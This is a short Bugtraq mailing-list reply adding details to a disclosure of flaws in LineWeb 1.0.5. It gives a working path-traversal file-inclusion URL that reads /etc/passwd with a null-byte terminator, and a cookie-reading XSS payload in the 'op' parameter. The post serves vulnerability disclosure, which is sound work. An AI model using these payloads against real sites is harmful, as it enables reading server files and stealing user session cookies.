[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20100106095546.11896.qmail@securityfocus.com>
Date: 6 Jan 2010 09:55:46 -0000
From: ign.sec@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: Multiple vulnerabilities in LineWeb 1.0.5
One thing i forgot, a %00 must be included at the end of the LFI, IE: index.php?op=../../../../../../../etc/passwd%00
And ?op is vulnerable to a xss attack, IE:
index.php?op=<script>alert(document.cookie)</script>
Ignacio.
Powered by blists - more mailing lists